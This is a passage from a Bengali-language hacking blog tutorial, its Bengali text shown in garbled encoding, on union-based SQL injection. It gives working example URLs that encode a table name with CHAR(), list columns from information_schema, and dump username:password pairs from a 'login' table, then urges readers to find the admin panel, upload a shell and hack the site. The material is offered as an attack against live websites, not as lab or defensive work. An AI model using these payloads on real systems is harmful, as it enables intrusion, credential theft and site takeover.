āϏে āĻ•্āώেāϤ্āϰে āϟেāĻŦিāϞ āύাāĻŽ āĻ•ে char āĻ āϰুāĻĒাāύ্āϤāϰ āĻ•āϰāϤে āĻšā§Ÿ।
āĻāϟা āĻ•āϰাāϰ āϜāύ্āϝে āĻŽোāϜিāϞা āĻĢা⧟াāϰ āĻĢāĻ•্āϏে āĻš্āϝাāĻ•āĻŦাāϰ āύাāĻŽে āĻāĻ•āϟি āĻāĻĄāĻ…āύ āφāĻ›ে āĻ“āϟা āĻāĻĄ āĻ•āϰে āύিāύ।
āϏāĻšāϜেāϰ char āĻ āϰুāĻĒাāύ্āϤāϰ āĻ•āϰāϤে āĻĒাāϰāĻŦেāύ।
āφāĻŽি login table āϟাāĻ•ে char āĻ āϰুāĻĒাāύ্āϤāϰ āĻ•āϰাāϰ āĻĒāϰ āϏেāϟা āĻšāϞো
CHAR(108, 111, 103, 105, 110)

āĻāĻ–āύ āφāĻŽāϰা āĻ•āĻŽাāύ্āĻĄāϟি āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•িāĻ­াāĻŦে āĻ•āϰে āϏেāϟা āĻĻেāĻ–āĻŦো।
āωāĻĻাāĻšাāϰāĻŖঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--

āĻāĻ–āύ āφāĻŽāϰা login āϟেāĻŦিāϞেāϰ āĻ•āϞাāĻŽ āĻ—ুāϞো āĻĻেāĻ–āϤে āĻĒাāĻŦে
āφāĻŽি āϝা āϝা āĻĒেāϞাāĻŽ।
id,username,password,email,date_added,lastlogin,sessionid,type,status

āĻāĻ–āύ āφāϏāϞ āĻ•াāϜ āĻļুāϰু ।
āĻāĻ–āύ āφāĻŽāϰা āĻ•āϞাāĻŽ āĻĨেāĻ•ে id āĻāĻŦং password āĻš্āϝাāĻ• āĻ•āϰāĻŦো ।
āĻāĻ–āύ āφāĻŽāϰা (username,0x3a,password) āĻāχ āĻ•āĻŽাāύ্āĻĄāϟি āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰāĻŦো
āĻāĻŦং login āϟেāĻŦিāϞ āĻĨেāĻ•ে āĻāχ āĻĻুāχāϟি āĻ•āϞাāĻŽেāϰ āĻĄাāϟা āĻŦেāϰ āĻ•āϰāĻŦো ।
āϝাāϰ āϜāύ্āϝে āĻ•āĻŽাāύ্āĻĄ āĻšāĻŦে।
āωāĻĻাāĻšাāϰāĻŖঃ
http://www.exaplme.sqlsite.com/page.php
?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from login--

āĻāĻ–āύ āφāĻĒāύি username āĻāĻŦং password āĻĻেāĻ–āϤে āĻĒাāĻŦেāύ।
āĻāĻ–āύ āφāĻĒāύাāϰ āĻ•াāϜ āĻšāĻŦে āĻāĻĄāĻŽিāύ āĻĒ্āϝাāύেāϞ āĻŦেāϰ āĻ•āϰে āϏাāχāϟāϟা āϤে āĻļেāϞ āφāĻĒāϞোāĻĄ āĻ•āϰে āĻš্āϝাāĻ• āĻ•āϰে āĻĢেāϞা :D

āφāĻŽি āφāĻ›ি āĻĢেāχāϏāĻŦুāĻ•েঃ  http://facebook.com/zayyan.ahmed.71
āϝāĻĻি āĻ•েāω āϰিāĻ•ুāĻāϏ্āϟ āĻĒাāĻ াāύ āĻĻ⧟া āĻ•āϰে āĻāĻ•āϟা āĻŽেāϏেāϜ āĻĻি⧟ে āĻĻিāĻŦেāύ āϏাāĻĨে।
āϝাāϤে āĻŦুāĻāϤে āϏুāĻŦিāϧা āĻšā§Ÿ।
āĻĒ্āϰা⧟ āĻĒাঁāϚ āϘāύ্āϟা āĻ•āώ্āϟ āĻ•āϰে āϏāĻŽ্āĻĒূāϰ্āĻŖ āϟিāωāύāϟা āϞেāĻ–āϞাāĻŽ, āφāĻļা āĻ•āϰি āφāĻĒāύাāĻĻেāϰ āĻ…āύেāĻ• āĻ­াāϞো āϞেāĻ—েāĻ›ে।

āφāĻ—াāĻŽি āϟিāωāϟোāϰি⧟াāϞে String Based Sql Injection āύি⧟ে āϞেāĻ–াāϰ āϚেāώ্āϟা āĻ•āϰāĻŦো।

 

 āϧāύ্āϝāĻŦাāĻĻ āϞেāĻ–āĻ•---

     http://facebook.com/zayyan.ahmed.71


Previous
Next Post »

āĻĒোāϏ্āϟ āϏāĻŽ্āĻĒāϰ্āĻ•িāϤ āϏāĻŽāϏ্āϝাāϰ āϜāύ্āϝ āĻŽāύ্āϤāĻŦ্āϝ āĻĻিāύ।āĻĄাāωāύāϞোāĻĄ āϞিāĻ™্āĻ• āĻ āϏāĻŽāϏ্āϝা āϜāύ্āϝ āχāύāĻŦāĻ•্āϏ āĻ•āϰুāύ Aimzworld007
ConversionConversion EmoticonEmoticon

Thanks for your comment